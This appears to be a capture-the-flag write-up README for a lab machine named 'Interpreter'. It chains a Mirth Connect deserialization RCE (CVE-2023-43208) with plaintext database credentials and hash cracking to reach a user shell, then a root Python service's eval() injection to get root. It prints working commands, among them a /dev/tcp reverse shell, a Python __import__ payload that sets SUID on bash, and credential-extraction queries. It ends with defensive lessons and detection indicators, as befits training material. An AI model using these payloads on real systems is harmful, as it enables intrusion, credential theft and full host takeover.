Skip to content

Interpreter

Directory actions

More options

Directory actions

More options

Latest commit

 

History

History

Interpreter

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 

README.md

layout default
title Interpreter
parent Medium Machines
grand_parent Machines
permalink /machines/medium/interpreter/

Interpreter

Machine Badge OS Difficulty Season

Property Value
OS Linux (Debian 12)
Difficulty Medium
Release 2026-02-21 (Season 10, Week 4)
Tags #mirth-connect #cve-2023-43208 #xstream #java-deserialization #python-eval #mysql

Summary

Interpreter exposes NextGen Healthcare Mirth Connect vulnerable to CVE-2023-43208, an unauthenticated Java deserialization RCE caused by XStream consuming attacker-controlled XML on /api/users with no class allowlist. Foothold lands as mirth. The Mirth installation properties expose MySQL credentials, where a stored hash cracks to SSH for a low-privileged user. A locally-bound (port 54321) root-owned Python HTTP service contains a Channel handler with a vulnerable eval(), yielding root.

External Writeups

Key Techniques

  • CVE-2023-43208: Mirth Connect pre-auth RCE via XStream deserialization
  • Commons Collections gadget chain in XStream payload
  • mirth.properties plaintext DB credentials
  • MySQL hash extraction + offline cracking
  • Localhost-bound root service enumeration
  • Python eval() injection on user-controlled input
  • Privilege escalation via in-process command execution

Attack Path

1. Recon

nmap -p- --min-rate=10000 -sV -sC interpreter.htb
# 22/tcp   ssh
# 8080/tcp http  - Mirth Connect 4.4.0
# 8443/tcp https - Mirth Connect REST API

2. CVE-2023-43208 - Pre-Auth RCE

/api/users accepts XML and deserializes via XStream without a whitelist. Public PoC:

git clone https://github.com/IHTeam-Sec/MirthRCE && cd MirthRCE
python3 exploit.py -t https://interpreter.htb:8443 \
  -c "bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'"

Listener returns shell as mirth.

3. Lateral Movement

grep -i 'database.*password\|database.url' /opt/mirthconnect/conf/mirth.properties
# database.url = jdbc:mysql://localhost:3306/mirthdb
# database.password = <plaintext>

mysql -u mirth -p mirthdb -e "SELECT name, password FROM users;"

The stored hash format is salt-bracketed; crack with hashcat (Mirth uses PBKDF2-SHA256). Resulting cleartext is a password reused by a local user - SSH as that user.

4. Root via Python eval()

Enumerate root-owned localhost services:

ss -ltnp | grep 'LISTEN.*127.0.0.1'
# 127.0.0.1:54321  python3 ... notif.py

notif.py runs as root and parses a JSON body. The handler calls eval(payload['filter']) (or similar). Inject:

curl -s http://127.0.0.1:54321/notify \
  -H 'Content-Type: application/json' \
  -d '{"filter":"__import__(\"os\").system(\"chmod +s /bin/bash\")"}'

/bin/bash -p
# euid=0

Lessons Learned

  • XStream-based deserialization is a serial offender (Mirth, Jenkins, OFBiz). Always check for unpatched versions when you see Java app servers.
  • Mirth Connect mirth.properties is a classic post-foothold loot file.
  • Localhost-only services are not safe just because they aren't externally bound - any user-context shell can reach them.
  • eval() on JSON / query fields remains one of the highest-impact one-liners; greybox audits should grep \beval\b\( aggressively.

Indicators / Detection

  • Mirth /api/users POST with Content-Type: application/xml and a body containing org.apache.commons.collections or ProcessBuilder markers.
  • mirth user spawning bash -i or non-Java child processes.
  • Root-owned Python service receiving JSON with backslash escapes around __import__, eval, exec, compile.